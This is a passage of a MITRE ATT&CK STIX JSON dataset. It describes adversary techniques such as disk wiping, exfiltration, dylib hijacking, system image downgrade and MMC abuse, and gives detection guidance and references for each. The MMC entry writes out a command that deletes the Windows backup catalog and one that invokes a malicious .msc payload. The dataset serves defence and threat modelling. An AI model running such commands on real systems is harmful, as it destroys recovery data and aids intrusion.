partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.\n\nFor network infrastructure devices, collect AAA logging to monitor for `erase` commands that delete critical configuration files.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", "created": "2020-02-20T22:06:41.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1561/001", "external_id": "T1561.001"}, {"source_name": "DOJ Lazarus Sony 2018", "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", "url": "https://www.justice.gov/opa/press-release/file/1092091/download"}, {"source_name": "Novetta Blockbuster Destructive Malware", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", "url": "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf"}, {"source_name": "Novetta Blockbuster", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf"}, {"source_name": "Microsoft Sysmon v6 May 2017", "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.", "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Exfiltration Over Unencrypted Non-C2 Protocol", "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["William Cain", "Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) \n\nFor network infrastructure devices, collect AAA logging to monitor for `copy` commands being run to exfiltrate configuration files to non-standard destinations over unencrypted protocols such as TFTP.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "x_mitre_network_requirements": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", "created": "2020-03-15T15:37:47.583Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1048/003", "external_id": "T1048.003"}, {"source_name": "copy_cmd_cisco", "description": "Cisco. (2022, August 16). copy - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-20T17:01:10.138Z", "name": "Modify Program", "description": "Adversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network. Modification to controller programs can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append. \n\nProgram modification encompasses the addition and modification of instructions and logic contained in Program Organization Units (POU) (Citation: IEC February 2013) and similar programming elements found on controllers. This can include, for example, adding new functions to a controller, modifying the logic in existing functions and making new calls from one function to another. \n\nSome programs may allow an adversary to interact directly with the native API of the controller to take advantage of obscure features or vulnerabilities.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.2", "x_mitre_data_sources": ["Network Traffic: Network Traffic Content", "Operational Databases: Device Alarm", "Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", "created": "2021-04-13T11:15:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0889", "external_id": "T0889"}, {"source_name": "IEC February 2013", "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", "url": "https://webstore.iec.ch/publication/4552"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Dylib Hijacking", "description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\n\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. \n\nRun path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, and LC_RPATH. Other special keywords are recognized by the macOS loader are @rpath, @loader_path, and @executable_path.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the otool -l command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490", "created": "2020-03-16T15:23:30.896Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/004", "external_id": "T1574.004"}, {"source_name": "MalwareUnicorn macOS Dylib Injection MachO", "description": "Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021.", "url": "https://malwareunicorn.org/workshops/macos_dylib_injection.html#5"}, {"source_name": "Apple Developer Doco Archive Run-Path", "description": "Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021.", "url": "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html"}, {"source_name": "Wardle Dylib Hijacking OSX 2015", "description": "Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved March 29, 2021.", "url": "https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf"}, {"source_name": "Writing Bad Malware for OSX", "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.", "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf"}, {"source_name": "Wardle Dylib Hijack Vulnerable Apps", "description": "Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021.", "url": "https://objective-see.com/blog/blog_0x46.html"}, {"source_name": "wardle artofmalware volume1", "description": "Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.", "url": "https://taomm.org/vol1/pdfs.html"}, {"source_name": "Github EmpireProject HijackScanner", "description": "Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021.", "url": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py"}, {"source_name": "Github EmpireProject CreateHijacker Dylib", "description": "Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021.", "url": "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Downgrade System Image", "description": "Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001). ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Many embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", "created": "2020-10-19T19:53:10.576Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1601/002", "external_id": "T1601.002"}, {"source_name": "Cisco Synful Knock Evolution", "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-07-14T13:04:04.591Z", "name": "Local Accounts", "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Containers", "Network"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", "created": "2020-03-13T20:26:46.695Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1078/003", "external_id": "T1078.003"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-15T11:41:47.274Z", "name": "Exploitation for Defense Evasion", "description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.\n\nThere have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries (Citation: Salesforce zero-day in facebook phishing attack), evade security logs (Citation: Bypassing CloudTrail in AWS Service Catalog), or deploy hidden infrastructure.(Citation: GhostToken GCP flaw)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["John Lambert, Microsoft Threat Intelligence Center"], "x_mitre_deprecated": false, "x_mitre_detection": "Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS", "SaaS", "IaaS"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "System access controls"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1211", "external_id": "T1211"}, {"source_name": "Salesforce zero-day in facebook phishing attack", "description": "Bill Toulas. (2023, August 2). Hackers exploited Salesforce zero-day in Facebook phishing attack. Retrieved September 18, 2023.", "url": "https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-phishing-attack/"}, {"source_name": "Bypassing CloudTrail in AWS Service Catalog", "description": "Nick Frichette. (2023, March 20). Bypassing CloudTrail in AWS Service Catalog, and Other Logging Research. Retrieved September 18, 2023.", "url": "https://securitylabs.datadoghq.com/articles/bypass-cloudtrail-aws-service-catalog-and-other/"}, {"source_name": "GhostToken GCP flaw", "description": "Sergiu Gatlan. (2023, April 21). GhostToken GCP flaw let attackers backdoor Google accounts. Retrieved September 18, 2023.", "url": "https://www.bleepingcomputer.com/news/security/ghosttoken-gcp-flaw-let-attackers-backdoor-google-accounts/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Trusted Developer Utilities Proxy Execution", "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Casey Smith", "Matthew Demaske, Adaptforward"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\n\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", "created": "2017-05-31T21:31:39.262Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1127", "external_id": "T1127"}, {"source_name": "Exploit Monday WinDbg", "description": "Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017.", "url": "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html"}, {"source_name": "LOLBAS Tracker", "description": "LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"}, {"source_name": "engima0x3 RCSI Bypass", "description": "Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017.", "url": "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/"}, {"source_name": "engima0x3 DNX Bypass", "description": "Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017.", "url": "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "System Shutdown/Reboot", "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Austin Clark, @c2defense", "Hubert Mank"], "x_mitre_deprecated": false, "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006. Unexpected or unauthorized commands from network cli on network devices may also be associated with shutdown/reboot, e.g. the reload command.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", "created": "2019-10-04T20:42:28.541Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1529", "external_id": "T1529"}, {"source_name": "Talos Nyetya June 2017", "description": "Chiu, A. (2016, June 27). New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide. Retrieved March 26, 2019.", "url": "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html"}, {"source_name": "alert_TA18_106A", "description": "CISA. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved February 14, 2022.", "url": "https://www.cisa.gov/uscert/ncas/alerts/TA18-106A"}, {"source_name": "Talos Olympic Destroyer 2018", "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html"}, {"source_name": "Microsoft Shutdown Oct 2017", "description": "Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019.", "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-10-25T14:00:00.188Z", "name": "MMC", "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)\n\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the \u201cLink to Web Address\u201d snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc.(Citation: abusing_com_reg)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Wes Hurd"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. \n\nMonitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as services.msc or eventvwr.msc. Invoking non-Microsoft .msc files may be an indicator of malicious activity. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application control", "Digital Certificate Validation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", "created": "2021-09-28T01:36:41.638Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/014", "external_id": "T1218.014"}, {"source_name": "abusing_com_reg", "description": "bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021.", "url": "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/"}, {"source_name": "mmc_vulns", "description": "Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021.", "url": "https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/"}, {"source_name": "win_msc_files_overview", "description": "Brinkmann, M.. (2017, June 10). Windows .msc files overview. Retrieved September 20, 2021.", "url": "https://www.ghacks.net/2017/06/10/windows-msc-files-overview/"}, {"source_name": "win_mmc", "description": "Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021.", "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc"}, {"source_name": "win_wbadmin_delete_catalog", "description": "Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021.", "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog"}, {"source_name": "win_clsid_key", "description": "Microsoft. (2018, May 31). CLSID Key. Retrieved September 24, 2021.", "url": 